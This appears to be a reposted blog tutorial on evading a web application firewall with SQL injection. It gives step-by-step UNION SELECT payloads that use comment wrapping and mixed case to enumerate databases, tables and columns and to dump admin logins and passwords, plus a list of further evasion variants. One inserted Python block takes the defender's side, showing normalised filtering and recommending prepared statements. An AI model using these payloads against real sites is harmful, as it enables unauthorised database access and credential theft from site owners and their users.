
SQL Injection [ Bypassing WAF (403 Forbidden) ]

Introduction:
OK, so this tutorial will teach you how to SQL Inject to bypass WAF (Web Application Firewall).

Let's start.

http://www.site.com/index.php?id=1 (No Errors!!)
http://www.site.com/index.php?id=1' (Error!!)
http://www.site.com/index.php?id=1+ORDER+BY+1,2,3,4,5-- (No Errors!!)
http://www.site.com/index.php?id=1+ORDER+BY+1,2,3,4,5,6-- (Error!!!)
http://www.site.com/index.php?id=1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)
http://www.site.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)



Now we will see if we can get one past the WAF by using comments to hide the parts of our statement that are most likely being filtered. In its basic form it looks like this:

http://www.site.com/index.php?id=1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)
http://www.site.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)
http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4,5-- (No Errors!!)



Now there is no more 403 Forbidden message stopping you and you can see the vulnerable columns displayed on the page. I will use my examples and assume columns 2, 4, & 5 are vulnerable. Now that we have the vulnerable columns we can extract some data, let’s first find some basic info though. We will use CONCAT to grab the current database name, the current user, and the version info, like this:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,CONCAT%28database%28%29,user%28%29,version%28%29%29,3,4,5-- (403 Forbidden – WTF?)


OK, so now we have commented out our UNION SELECT statement, but something is still setting off the filters; it is most likely the CONCAT call. In some cases it is possible to bypass filters simply by varying the usual form and re-testing. This can be accomplished with comments or by simply changing CaPiTAliZaTIon, like so:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,ConCAt%28database%28%29,user%28%29,version%28%29%29,3,4,5-- (No Errors!!)

Results:
· Version = 5.0.92-community-log
· User = dumbdba@localhost
· Database() = exampleDB



It worked! We now know the current database name, user name and version, as they are neatly displayed on the page for us. These two techniques can be combined to evade filters throughout your injections, as you will see. Now let us try to get the list of all available databases, instead of just the current one, like so:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT%28SCHEMA_NAME%29,3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA-- (403 Forbidden)



Luckily we know what to do now so start by altering GROUP_CONCAT, same as we did for CONCAT:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28SCHEMA_NAME%29,3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA-- (No Errors!!)

Results:
· Information_Schema
· exampleDB


This should now show us the available databases! Now let us check for the tables tied to the current database.
http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28TABLE_NAME%29,3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29-- (403 Forbidden again)

In some cases you may have experienced a 403 in the previous step as well; this is because INFORMATION_SCHEMA or TABLES is often filtered. Again, this changes from site to site based on how the WAF was configured, so it could even be other items, but these are the most common. To get around the filters we simply use our comments method again, so it looks like this:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28TABLE_NAME%29,3,4,5+FROM+/*!INFORMATION_SCHEMA*/.TABLES-- (No Errors!!)

TABLES FOUND: Admin, News, Ads, Users

Now we have all of the tables for the current database displayed on the page without any 403 holding us back. We can get columns using the same method as we used in the Basic SQLi 101 examples but we will keep our comments and capitalization techniques alive so it gets past the WAF (reminder to also HEX your table names).

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28COLUMN_NAME%29,3,4,5+FROM+/*!INFORMATION_SCHEMA*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e-- (No Errors!!)

The page will now display a list of the columns from the Admin table in the spot where vulnerable column 2 is rendered. In this example we will assume we found the following column names:
· id
· login
· password
· email

OK, now we know the tables and their associated columns. It is time to extract some data, like this:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28id,0x3a,login,0x3a,password,0x3a,email,0x3a%29,3,4,5+FROM+Admin--


Alright, you have successfully gotten past a WAF system! Enjoy!

EXTRA EXAMPLES:
Admins will filter all kinds of things, like words (UNION, SELECT, LIKE) and symbols (=, !=, '), so here are some additional examples to help get you on your way:

Using comments to break up the standard forms that would normally be used and are therefore possibly filtered:
· /**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
- union select column from table
· /*!union*/+/*!select*/+1,2,3--
- Union select 1,2,3
· /*!UnIOn*//*!SeLect*/+1,2,3--
- Union select 1,2,3
· un/**/ion+sel/**/ect+1,2,3--
- Union select 1,2,3
· /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--
- Union select 1,2,3
· Query within query (stacked query) and both methods in use:
- ID=66+UnIoN+aLL+SeLeCt+1,2,3,4,5,6,7,(SELECT+concat(0x3a,id,0x3a,password,0x3a)+FROM+information_schema.columns+WHERE+table_schema=0x6334706F645F666573746976616C5F636D73+AND+table_name=0x7573657273),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
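A defender-side illustration of why the comment and capitalisation tricks above slip past a simple blocklist, added here as an example and not part of the original post: a case-sensitive substring match on the raw query string misses every variant, while URL-decoding, unwrapping `/*! ... */` comments, collapsing ordinary comments and case-folding first (what a WAF rule or detection should do) catches them. The sample query strings are constructed to mirror the payload shapes in this tutorial, and `naive_filter`, `normalize` and `normalized_filter` are hypothetical names.

```python
import re
from urllib.parse import unquote_plus

# Constructed query strings shaped like the tutorial's payloads (not captured traffic).
SAMPLES = {
    "plain":  "id=-1+UNION+SELECT+1,2,3,4,5--",
    "bang":   "id=-1+/*!UNION*/+/*!SELECT*/+1,ConCAt%28database%28%29,user%28%29%29,3,4,5--",
    "split":  "id=1+un/**/ion+sel/**/ect+1,2,3--",
    "inline": "id=1/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--",
    "benign": "id=42",
}

# Blocklist terms, written the way they look after normalisation.
SIGNATURES = ("union select", "information_schema", "concat(")

_BANG_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)   # MySQL executes the body of /*! ... */
_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)               # /* ... */ carries no SQL

def naive_filter(query: str) -> bool:
    """Case-sensitive substring match on the raw, still-encoded query string:
    the behaviour the tutorial's pattern of 403s and successes is consistent with."""
    return any(sig in query for sig in ("UNION+SELECT", "INFORMATION_SCHEMA", "CONCAT("))

def normalize(query: str) -> str:
    """Reduce a query string towards what the database parser will actually see."""
    text = unquote_plus(query)                 # '%28' -> '(' and '+' -> ' '
    text = _BANG_COMMENT.sub(r" \1 ", text)    # keep the executable body of /*! ... */
    text = _PLAIN_COMMENT.sub(" ", text)       # treat an ordinary comment as a separator
    return re.sub(r"\s+", " ", text).strip().lower()

def normalized_filter(query: str) -> bool:
    """Match SIGNATURES against the normalised text both as written and with all
    whitespace removed, so keywords split by comments (un/**/ion) are caught too."""
    text = normalize(query)
    squeezed = text.replace(" ", "")
    return any(sig in text or sig.replace(" ", "") in squeezed for sig in SIGNATURES)

if __name__ == "__main__":
    for name, q in SAMPLES.items():
        print(f"{name:6} naive={naive_filter(q)!s:5} normalized={normalized_filter(q)!s:5}  {normalize(q)}")
```

Normalising before matching narrows the gap, but it is still a blocklist; the durable fix for `index.php?id=` is to bind the id as a parameter in a prepared statement so no user input is ever parsed as SQL.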

If you can't use WHERE, try some form of the LIMIT clause instead:
· LIMIT 0,1
- note that 0,1 gets 1 result starting from the 0th row (first entry)
- to view the second table, we change limit 0,1 to limit 1,1

If you can't use the "=" sign, try the not-equal sign "!=" instead to find other items based on any base you have already found. For example, if you know the current DB, you could check for !=database() in your request to possibly find alternative databases (or tables or columns).

If you can use one, you might be able to try another:
· If substring() is being filtered you can also use mid() OR substr() to get similar results
- select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
· If ascii() is being filtered you can also use hex() OR bin() to get similar results
· If you can’t use benchmark() you might also try sleep()
· 0x3a can be used to replace a colon ':' as it is the HEX value
- Helpful in separating results
- i.e. group_concat(user,0x3a,fd_Password) = user:fd_Password
· 0x0a can be used to create new line for results to be displayed easier

I like to start, when doing my vulnerability checks, by seeing how the system is filtering things. Try using double quotes, single quotes, pound symbols, comments, etc., both to see if they trigger any errors indicating the site is vulnerable and to take note of the methods being used to filter input.
· ' becomes "' or */; play with things and take mental notes and you will see patterns over time. The same is true of errors when UNION or CONCAT is missing: it is another clue to what is going on on the other side.
- I have not found a complete list, but would like to have one for reference of which filters indicate what type of WAF/IDS is in use, so if anyone has something please message me or send it my way so I can make an update to include it.

The point here is to get creative: a WAF typically only filters what the admin configures, and legitimate use of some items still has to be allowed, so there will always be options; it is just a matter of making them work for you. Enjoy!

This article is reposted from hackfreer's 51CTO blog; original link: http://blog.51cto.com/pnig0s1992/744023. Contact the original author before reproducing it.
